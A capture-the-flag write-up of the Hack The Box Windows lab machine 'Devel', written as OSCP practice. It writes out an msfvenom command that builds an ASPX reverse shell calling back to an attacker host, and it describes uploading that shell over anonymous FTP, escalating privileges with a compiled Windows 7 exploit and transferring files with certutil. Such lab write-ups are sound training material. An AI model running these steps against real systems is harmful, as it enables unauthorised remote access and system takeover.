Devel HTB Writeup w/o Metasploit

Welcome ! This next machine is a windows machine called Devel. This is the second machine in the series and part of TJ Nulls list of OSCP like boxes.

Enumeration

First thing we want to do is enumerate. Let’s start by running our nmap scan.

nmap -T4 -A 10.10.10.5

  • -T4 sets timing template
  • -A runs an aggressive scan

Immediately I notice that ftp anonymous login is allowed. Let’s try logging in to the ftp server and see what we find.

The files on the ftp server look interesting. I notice right away some words like “iis” and “aspnet” in the file names. This indicates that the ftp server may be housing the web server files. Let’s check and see if we can access any of these files through our browser.

Looks like we can. This is perfect ! If we can get a reverse shell onto the ftp server using the ftp PUT method we can gain an initial foothold.

Let’s use msfvenom to generate our reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f aspx > reverse_tcp.aspx

  • -p payload
  • LHOST listening host (attacker machine)
  • LPORT listening port (attacker machine)
  • -f payload format (aspx) since the web server is running aspnet

Now let’s use the ftp put command to upload our reverse shell onto the ftp server.

Great it worked! Now we should be able to set up our listener through netcat and run the exploit through the browser.

Ran the exploit through the browser.

Bet! We got a shell.

Note: I set the listener to listen on port 4444 which is the exact same port I specified on the msfvenom reverse shell I created. It’s extremely important that the ports and IPs are the same on the payload and the listener otherwise the payload will not work.

Now that we have a shell let’s grab the root and user flags.

Ahh we don’t have access. Looks like the shell I have is low privilege. I need to escalate my privileges to authority system. Let’s do some more information gathering before we search for a way to privesc.

systeminfo

Running systeminfo displays details about the operating system. I can use this information to find a privilege escalation exploit. Let’s see if we can find something for Windows 7 OS Version 6.1.7600.

Looks like we found something. Let’s take a look at the exploit for any dependencies.

Looks like we need mingw to compile the code. So I’m going to install it first before moving forward.

Okay we’re done installing mingw. Let’s compile the script.

First I’m going to change to the Temp directory on the vulnerable machine. I need to get to a directory that will allow me to run the exploit script once I upload it. The temp folder usually allows low priv users to run executables.

Now that I’m in the Temp directory I need to get the exploit onto the machine so we can run it and escalate our privileges.

Let’s start up an http server first. I’m going to use the http server to host the exploit and then use the certutil utility on the vulnerable machine to upload the exploit.

Now lets upload the exploit on the machine.

The upload completed successfully so the exploit should be on our vulnerable machine now.

Great! Our exploit is uploaded. Now lets run it.

It worked ! We have authority system privileges and we can grab the root and user flags.

Lessons Learned

This box was pretty straight forward but there is always something to learn. I learned the importance of privilege escalation. I wont always get a root shell and I need to understand different strategies for escalating privileges on Linux and Windows machines. This box also emphasized the importance of understanding the exploit I am using. Sometimes there will be dependencies that need to be downloaded before I can run the exploit. Also this writeup would have been easier to write if I wrote it right after I finished this machine. My good notes really helped me get this writeup done!

mastering the craft of ethical hacking